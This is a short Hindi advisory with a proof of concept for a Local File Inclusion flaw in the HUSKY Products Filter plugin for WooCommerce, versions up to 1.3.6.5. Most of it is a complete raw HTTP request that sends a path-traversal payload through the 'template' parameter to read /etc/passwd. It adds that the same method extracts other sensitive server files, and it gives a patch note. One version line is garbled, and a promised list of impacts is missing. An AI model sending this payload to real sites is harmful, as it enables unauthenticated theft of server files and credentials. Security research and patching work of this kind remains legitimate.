
HUSKY – Products Filter Professional for WooCommerce plugin for WordPress Local File Inclusion (LFI) के प्रति संवेदनशील है।
WordPress के लिए HUSKY – Products Filter Professional for WooCommerce प्लगइन woof_text_search AJAX एक्शन के template पैरामीटर के माध्यम से सभी संस्करणों 1.3.6.5 तक स्थानीय फ़ाइल समावेशन (LFI) के प्रति संवेदनशील है।
यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने की अनुमति देता है, जिससे संभावित रूप से निम्नलिखित हो सकता है:
<= 1.3.6.51.3.6.6संस्करण 1.3.6.6 या नए पैच किए गए संस्करण में अपडेट करें।
POST /wp-admin/admin-ajax.php?template=../../../../../../../etc/passwd&value=a&min_symbols=1 HTTP/1.1
Host: TARGET_SITE_HERE
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Cookie: YOUR_SESSION_COOKIE_HERE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 24
action=woof_text_search&
4. यदि सफल होता है, तो सर्वर /etc/passwd की सामग्री लौटाएगा।
5. इसका उपयोग सर्वर से अन्य संवेदनशील फ़ाइलों को निकालने के लिए किया जा सकता है।
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। अनुमति के बिना सिस्टम के विरुद्ध अनधिकृत परीक्षण अवैध और अनैतिक है। कोई भी सुरक्षा परीक्षण करने से पहले हमेशा स्पष्ट प्राधिकरण प्राप्त करें।